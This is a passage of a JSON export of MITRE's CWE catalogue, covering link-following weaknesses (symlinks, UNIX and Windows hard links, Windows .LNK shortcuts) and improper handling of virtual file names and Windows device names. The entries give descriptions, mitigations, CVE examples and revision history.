access.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"59","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"362","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"340","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"386","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"732","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Symlink following"},{"Term":"symlink vulnerability"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"These are typically reported for temporary files or privileged programs."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Symbolic link attacks often occur when a program creates a tmp directory that stores files/links. Access to the directory should be restricted to the program as to prevent attackers from manipulating the files."},{"attr":{"@_Mitigation_ID":"MIT-48.1"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Follow the principle of least privilege when assigning access rights to entities in a software system.","Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted."]}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1386","Description":"Some versions of Perl follows symbolic links when running with the -e option, which allows local users to overwrite arbitrary files via a symlink attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1386"},{"Reference":"CVE-2000-1178","Description":"Text editor follows symbolic links when creating a rescue copy during an abnormal exit, which allows local users to overwrite the files of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1178"},{"Reference":"CVE-2004-0217","Description":"Antivirus update allows local users to create or append to arbitrary files via a symlink attack on a logfile.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0217"},{"Reference":"CVE-2003-0517","Description":"Symlink attack allows local users to overwrite files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0517"},{"Reference":"CVE-2004-0689","Description":"Possible interesting example","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0689"},{"Reference":"CVE-2005-1879","Description":"Second-order symlink vulnerabilities","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1879"},{"Reference":"CVE-2005-1880","Description":"Second-order symlink vulnerabilities","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1880"},{"Reference":"CVE-2005-1916","Description":"Symlink in Python program","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1916"},{"Reference":"CVE-2000-0972","Description":"Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0972"},{"Reference":"CVE-2005-0824","Description":"Signal causes a dump that follows symlinks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0824"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"UNIX symbolic link following"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"27"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-493"}},{"attr":{"@_External_Reference_ID":"REF-494"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, "Symbolic Link Attacks", Page 518"}}]},"Notes":{"Note":{"attr":{"@_Type":"Research Gap"},"xhtml:p":["Symlink vulnerabilities are regularly found in C and shell programs, but all programming languages can have this problem. Even shell programs are probably under-reported.","\\"Second-order symlink vulnerabilities\\" may exist in programs that invoke other programs that follow symlinks. They are rarely reported but are likely to be fairly common when process invocation is used. Reference: [Christey2005]"]}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, Research_Gaps, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"62":{"attr":{"@_ID":"62","@_Name":"UNIX Hard Link","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software, when opening a file or directory, does not sufficiently account for when the name is associated with a hard link to a target that is outside of the intended control sphere. This could allow an attacker to cause the software to operate on unauthorized files.","Extended_Description":"Failure for a system to check for hard links can result in vulnerability to different types of attacks. For example, an attacker can escalate their privileges if a file used by a privileged program is replaced with a hard link to a sensitive file (e.g. /etc/passwd). When the process opens the file, the attacker can assume the privileges of that process.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"59","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Unix","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-48.1"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Follow the principle of least privilege when assigning access rights to entities in a software system.","Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted."]}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1494","Description":"Hard link attack, file overwrite; interesting because program checks against soft links","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1494"},{"Reference":"CVE-2002-0793","Description":"Hard link and possibly symbolic link following vulnerabilities in embedded operating system allow local users to overwrite arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0793"},{"Reference":"CVE-2003-0578","Description":"Server creates hard links and unlinks files as root, which allows local users to gain privileges by deleting and overwriting arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0578"},{"Reference":"CVE-1999-0783","Description":"Operating system allows local users to conduct a denial of service by creating a hard link from a device special file to a file on an NFS file system.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0783"},{"Reference":"CVE-2004-1603","Description":"Web hosting manager follows hard links, which allows local users to read or modify arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1603"},{"Reference":"CVE-2004-1901","Description":"Package listing system allows local users to overwrite arbitrary files via a hard link attack on the lockfiles.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1901"},{"Reference":"CVE-2005-0342","Description":"The Finder in Mac OS X and earlier allows local users to overwrite arbitrary files and gain privileges by creating a hard link from the .DS_Store file to an arbitrary file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0342"},{"Reference":"CVE-2005-1111","Description":"Hard link race condition","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1111"},{"Reference":"BUGTRAQ:20030203 ASA-0001","Description":"OpenBSD chpass/chfn/chsh file content leak","Link":"http://www.securityfocus.com/archive/1/309962"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"UNIX hard link"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO05-C","Entry_Name":"Identify files using multiple file attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP18","Entry_Name":"Link in resource name resolution"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, "Hard Links", Page 518"}}},"Notes":{"Note":{"#text":"Under-studied. It is likely that programs that check for symbolic links could be vulnerable to hard links.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"64":{"attr":{"@_ID":"64","@_Name":"Windows Shortcut Following (.LNK)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software, when opening a file or directory, does not sufficiently handle when the file is a Windows shortcut (.LNK) whose target is outside of the intended control sphere. This could allow an attacker to cause the software to operate on unauthorized files.","Extended_Description":"The shortcut (file with the .lnk extension) can permit an attacker to read/write a file that they originally did not have permissions to access.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"59","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Windows symbolic link following"},{"Term":"symlink"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-48.1"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Follow the principle of least privilege when assigning access rights to entities in a software system.","Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted."]}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0342","Description":"Mail client allows remote attackers to bypass the user warning for executable attachments such as .exe, .com, and .bat by using a .lnk file that refers to the attachment, aka \\"Stealth Attachment.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0342"},{"Reference":"CVE-2001-1042","Description":"FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1042"},{"Reference":"CVE-2001-1043","Description":"FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1043"},{"Reference":"CVE-2005-0587","Description":"Browser allows remote malicious web sites to overwrite arbitrary files by tricking the user into downloading a .LNK (link) file twice, which overwrites the file that was referenced in the first .LNK file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0587"},{"Reference":"CVE-2001-1386","Description":"\\".LNK.\\" - .LNK with trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1386"},{"Reference":"CVE-2003-1233","Description":"Rootkits can bypass file access restrictions to Windows kernel directories using NtCreateSymbolicLinkObject function to create symbolic link","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1233"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Windows Shortcut Following (.LNK)"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO05-C","Entry_Name":"Identify files using multiple file attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP18","Entry_Name":"Link in resource name resolution"}]},"Notes":{"Note":{"#text":"Under-studied. Windows .LNK files are more \\"portable\\" than Unix symlinks and have been used in remote exploits. Some Windows API\'s will access LNK\'s as if they are regular files, so one would expect that they would be reported more frequently.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"65":{"attr":{"@_ID":"65","@_Name":"Windows Hard Link","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software, when opening a file or directory, does not sufficiently handle when the name is associated with a hard link to a target that is outside of the intended control sphere. This could allow an attacker to cause the software to operate on unauthorized files.","Extended_Description":"Failure for a system to check for hard links can result in vulnerability to different types of attacks. For example, an attacker can escalate their privileges if a file used by a privileged program is replaced with a hard link to a sensitive file (e.g. AUTOEXEC.BAT). When the process opens the file, the attacker can assume the privileges of that process, or prevent the program from accurately processing data.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"59","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-48.1"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Follow the principle of least privilege when assigning access rights to entities in a software system.","Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted."]}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0725","Description":"File system allows local attackers to hide file usage activities via a hard link to the target file, which causes the link to be recorded in the audit trail instead of the target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0725"},{"Reference":"CVE-2003-0844","Description":"Web server plugin allows local users to overwrite arbitrary files via a symlink attack on predictable temporary filenames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0844"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Windows hard link"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO05-C","Entry_Name":"Identify files using multiple file attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP18","Entry_Name":"Link in resource name resolution"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, "Links", Page 676"}}},"Notes":{"Note":{"#text":"Under-studied","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"66":{"attr":{"@_ID":"66","@_Name":"Improper Handling of File Names that Identify Virtual Resources","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not handle or incorrectly handles a file name that identifies a \\"virtual\\" resource that is not directly specified within the directory that is associated with the file name, causing the product to perform file-based operations on a resource that is not a file.","Extended_Description":"Virtual file names are represented like normal file names, but they are effectively aliases for other resources that do not behave like normal files. Depending on their functionality, they could be alternate entities. They are not necessarily listed in directories.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Virtual Files"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Virtual Files","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle File Names that Identify Virtual Resources","attr":{"@_Date":"2009-03-10"}}]}},"67":{"attr":{"@_ID":"67","@_Name":"Improper Handling of Windows Device Names","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software constructs pathnames from user input, but it does not handle or incorrectly handles a pathname containing a Windows device name such as AUX or CON. This typically leads to denial of service or an information exposure when the application attempts to process the pathname as a regular file.","Extended_Description":"Not properly handling virtual filenames (e.g. AUX, CON, PRN, COM1, LPT1) can result in different types of vulnerabilities. In some cases an attacker can request a device via injection of a virtual filename in a URL, which may cause an error that leads to a denial of service or an error page that reveals sensitive information. A software system that allows device names to bypass filtering runs the risk of an attacker injecting malicious code in a file with the name of a device.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"66","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Historically, there was a bug in the Windows operating system that caused a blue screen of death. Even after that issue was fixed DOS device names continue to be a factor."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Availability","Confidentiality","Other"],"Impact":["DoS: Crash, Exit, or Restart","Read Application Data","Other"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Be familiar with the device names in the operating system where your system is deployed. Check input for these device names."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0106","Description":"Server allows remote attackers to cause a denial of service via a series of requests to .JSP files that contain an MS-DOS device name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0106"},{"Reference":"CVE-2002-0200","Description":"Server allows remote attackers to cause a denial of service via an HTTP request for an MS-DOS device name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0200"},{"Reference":"CVE-2002-1052","Description":"Product allows remote attackers to use MS-DOS device names in HTTP requests to cause a denial of service or obtain the physical path of the server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1052"},{"Reference":"CVE-2001-0493","Description":"Server allows remote attackers to cause a denial of service via a URL that contains an MS-DOS device name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0493"},{"Reference":"CVE-2001-0558","Description":"Server allows a remote attacker to create a denial of service via a URL request which includes a MS-DOS device 